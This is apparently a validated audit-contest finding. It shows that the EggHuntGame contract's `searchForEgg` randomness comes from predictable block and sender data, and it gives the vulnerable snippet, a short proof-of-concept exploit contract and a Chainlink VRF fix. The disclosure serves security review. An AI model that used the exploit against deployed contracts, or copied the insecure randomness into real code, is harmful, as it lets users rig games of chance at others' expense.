Eggstravaganza

First Flight #37
Submission Details
Severity: high
Valid

`EggHuntGame::searchForEgg` success can be determined before function call

Summary

The function `EggHuntGame::searchForEgg` uses a pseudo-random number generator that relies on ascertainable data (`block.timestamp`, `block.prevrandao`, `msg.sender` and `EggHuntGame::eggCounter`), leaving the protocol open to exploitation to guarantee eggs.

Vulnerability Details

To determine whether a Player will find an egg, the EggHuntGame::searchForEgg function implements the following logic:

```solidity
uint256 random = uint256(
    keccak256(abi.encodePacked(block.timestamp, block.prevrandao, msg.sender, eggCounter))
) % 100;
```

As this information is ascertainable by any Player, they can simply call the function when they are guaranteed success. For example, a contract designed to exploit this vulnerability:

```solidity
// Assumes EggHuntGame and a `console` library (e.g. forge-std) are imported in this file.
contract Exploit {
    EggHuntGame public eggHuntGame;

    constructor(address _eggHuntAddress) {
        eggHuntGame = EggHuntGame(_eggHuntAddress);
    }

    // Recomputes the draw from the same inputs searchForEgg uses.
    // msg.sender here is whoever calls callGetEgg.
    function callGetEgg() public view returns (bool) {
        uint256 random = uint256(
            keccak256(abi.encodePacked(block.timestamp, block.prevrandao, msg.sender, eggHuntGame.eggCounter()))
        ) % 100;
        console.log("Random number: ", random);
        if (random < eggHuntGame.eggFindThreshold()) {
            return true;
        } else {
            return false;
        }
    }
}
```

Impact

This vulnerability has a direct impact on the main functionality of the protocol, removing the chance of Player failure.

Tools Used

Manual review.

Recommendations

It is recommended that any randomly generated values are implemented using an oracle service such as Chainlink VRF.

Updates

Lead Judging Commences

m3dython Lead Judge 8 months ago
Submission Judgement Published
Validated
Assigned finding tags:

Insecure Randomness

Insecure methods to generate pseudo-random numbers
